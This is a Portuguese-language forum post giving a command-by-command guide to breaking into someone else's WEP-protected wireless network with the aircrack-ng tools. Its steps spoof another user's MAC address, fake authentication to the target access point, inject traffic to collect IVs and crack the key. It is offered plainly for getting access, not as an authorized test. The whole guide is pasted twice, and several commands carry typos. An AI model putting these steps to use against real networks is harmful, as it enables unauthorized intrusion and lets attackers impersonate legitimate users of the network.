E o seguinte galera, não vou perder muito tempo com histórias, vamos ao que interessa.
Acesso rede Wireless – rápido e fácil
Sistemas: Backtrack, WifiSlax 3.1
ANTES DE INICIAR OPERAÇÂO:
1º - Saber seu Mac
2º - Saber BSSID, SSID, CANAL do AP que você vai fazer monitoramento.
BSSID – MAC do AP (Acess Point – Provedor Internet Via Rádio)
ESSID – Nome do AP
MAC_FALSO - MAC de um outro usuário ou um falso
WLAN1 – Sua interface de rede
LOG – log do escaneamento.
Obs: O MAC de uma placa contém 06 camadas: 00:00:00:00:00:00. (Ex: 00:0E:EE:E8:81:E1)
VAMOS AO QUE INTERESA:
Inicie o sistema {se estiver usando o WifiSlax o login é root e a senha toor (root ao contrario)
1) Abra um console e escreva:
Verificar qual interface de rede você está usando
# Airmon-ng
Parar monitoramento para entrar com novas configurações de MAC
# Airmon-ng stop wlan1
# Ifconfig wlan1 down
# Ifconfig wlan1 hw ether [mac_falso]
# Ifconfig wlan1 up
Ou use apenas...
# Maccharger –m [mac_falso] wlan1 –
Inicia interface em MODO MONITOR
# Airmon-ng start wlan1
Scaneia por todas as redes possíveis
# Airodump-ng wlan1
Selecionar apenas por um canal específico gravando o num arquivo log o resultado
# Airodumpng –c [canal] –w [arq_log] –bssid [BSSID] wlan1
2) Utilizando uma autenticação falsa. Abra um segundo console e escreva:
# Aireplay-ng –1 0 –e [ESSID] –a [BSSID] –h [mac_falso] wlan1
{0 = tempo em segundos,}
3) Injetar trafego na rede / Maior captura de pacotes IV’s (quanto mais tráfego, mais rápido a captura da senha). Abra um terceiro console e escreva:
# Aireplay-ng –3 –x 512 –b [BSSID] –h [mac_falso] wlan1
4) Quebra de senha. Abra um querto console:
# Aircrack-ng –z –b [BSSID] LOG* .cap
OBS: Este é o inicio, farei outras atualizações em breve!
Acesso rede Wireless – rápido e fácil
Sistemas: Backtrack, WifiSlax 3.1
ANTES DE INICIAR OPERAÇÂO:
1º - Saber seu Mac
2º - Saber BSSID, SSID, CANAL do AP que você vai fazer monitoramento.
BSSID – MAC do AP (Acess Point – Provedor Internet Via Rádio)
ESSID – Nome do AP
MAC_FALSO - MAC de um outro usuário ou um falso
WLAN1 – Sua interface de rede
LOG – log do escaneamento.
Obs: O MAC de uma placa contém 06 camadas: 00:00:00:00:00:00. (Ex: 00:0E:EE:E8:81:E1)
VAMOS AO QUE INTERESA:
Inicie o sistema {se estiver usando o WifiSlax o login é root e a senha toor (root ao contrario)
1) Abra um console e escreva:
Verificar qual interface de rede você está usando
# Airmon-ng
Parar monitoramento para entrar com novas configurações de MAC
# Airmon-ng stop wlan1
# Ifconfig wlan1 down
# Ifconfig wlan1 hw ether [mac_falso]
# Ifconfig wlan1 up
Ou use apenas...
# Maccharger –m [mac_falso] wlan1 –
Inicia interface em MODO MONITOR
# Airmon-ng start wlan1
Scaneia por todas as redes possíveis
# Airodump-ng wlan1
Selecionar apenas por um canal específico gravando o num arquivo log o resultado
# Airodumpng –c [canal] –w [arq_log] –bssid [BSSID] wlan1
2) Utilizando uma autenticação falsa. Abra um segundo console e escreva:
# Aireplay-ng –1 0 –e [ESSID] –a [BSSID] –h [mac_falso] wlan1
{0 = tempo em segundos,}
3) Injetar trafego na rede / Maior captura de pacotes IV’s (quanto mais tráfego, mais rápido a captura da senha). Abra um terceiro console e escreva:
# Aireplay-ng –3 –x 512 –b [BSSID] –h [mac_falso] wlan1
4) Quebra de senha. Abra um querto console:
# Aircrack-ng –z –b [BSSID] LOG* .cap
OBS: Este é o inicio, farei outras atualizações em breve!
Comment